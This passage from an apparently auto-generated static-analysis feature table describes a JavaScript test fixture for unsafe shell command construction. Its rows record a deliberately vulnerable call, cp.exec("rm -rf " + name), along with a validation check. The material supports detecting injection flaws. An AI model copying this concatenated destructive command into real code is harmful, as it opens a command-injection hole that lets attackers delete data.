name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:111:34:111:37 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:3 | cp | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:3 | cp | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:8 | cp.exec | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:5:112:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:5:112:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:5:112:8 | exec | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:5:112:8 | exec | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:5:112:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:18 | "rm -rf " | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:10:112:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:22:112:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:22:112:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:22:112:25 | name | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:22:112:25 | name | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:22:112:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:22:112:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:6:114:23 | !isValidName(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:6:114:23 | !isValidName(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:6:114:23 | !isValidName(name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:6:114:23 | !isValidName(name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:6:114:23 | !isValidName(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:17 | isValidName | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:17 | isValidName | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:17 | isValidName | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:17 | isValidName | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:17 | isValidName | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | exceptional return of isValidName(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | exceptional return of isValidName(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | exceptional return of isValidName(name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | exceptional return of isValidName(name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | exceptional return of isValidName(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) | enclosingFunctionName | valid | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:3 | cp | enclosingFunctionBody | name cp exec rm -rf name isValidName name cp exec rm -rf name | +| 